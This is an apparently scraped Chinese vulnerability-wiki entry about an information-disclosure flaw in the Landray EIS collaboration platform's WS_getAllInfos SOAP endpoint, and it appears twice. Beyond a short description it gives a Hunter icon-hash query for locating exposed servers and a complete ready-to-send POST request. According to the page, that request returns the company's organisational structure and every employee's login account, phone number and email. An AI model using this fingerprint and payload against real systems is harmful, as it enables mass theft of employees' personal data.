fofamini-wiki

登录白背景

源码

蓝凌 EIS智慧协同平台WS_getAllInfos存在信息泄露漏洞

一、漏洞简介

蓝凌智慧协同平台EIS以“让工作更智慧”为核心设计理念，面向成长型企业管理需求特别开发设计，旨在全面解决成长型企业的各种难题，蓝凌EIS存在信息泄露漏洞，攻击者可通过该漏洞获取公司组织架构和公司所有员工登录账号、手机号及邮箱等敏感个人信息。

二、影响版本

蓝凌EIS智慧协同办公平台

三、资产测绘

hunterweb.icon=="585275a4cc54b8414554d03e1359a101"

特征

四、漏洞复现

POST /WS/Basic/Basic.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FI
Upgrade-Insecure-Requests: 1
SOAPAction: http://tempuri.org/WS_getAllInfos
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:WS_getAllInfos/>
</soapenv:Body>
</soapenv:Envelope>

原文: https://www.yuque.com/xiaokp7/ocvun2/tmi1cexggpgsq5fe

# 蓝凌 EIS智慧协同平台WS_getAllInfos存在信息泄露漏洞

# 一、漏洞简介
蓝凌智慧协同平台EIS以“让工作更智慧”为核心设计理念，面向成长型企业管理需求特别开发设计，旨在全面解决成长型企业的各种难题，蓝凌EIS存在信息泄露漏洞，攻击者可通过该漏洞获取公司组织架构和公司所有员工登录账号、手机号及邮箱等敏感个人信息。

# 二、影响版本

- 蓝凌EIS智慧协同办公平台

# 三、资产测绘

- hunter`web.icon=="585275a4cc54b8414554d03e1359a101"`

![image.png](./img/Rrrmd9maxI-UvMnO/1695781361668-b6da51c8-4280-4dde-8fa3-62c69433e064-025960.png)

- 特征

![image.png](./img/Rrrmd9maxI-UvMnO/1695781168608-7b142276-b588-4844-837a-4bcf995ad670-997401.png)

# 四、漏洞复现
```java
POST /WS/Basic/Basic.asmx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FI
Upgrade-Insecure-Requests: 1
SOAPAction: http://tempuri.org/WS_getAllInfos
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:WS_getAllInfos/>
</soapenv:Body>
</soapenv:Envelope>
```
![image.png](./img/Rrrmd9maxI-UvMnO/1708764281149-2f8fac6b-9f2a-4ce6-82e7-08fe97b369d9-780064.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tmi1cexggpgsq5fe>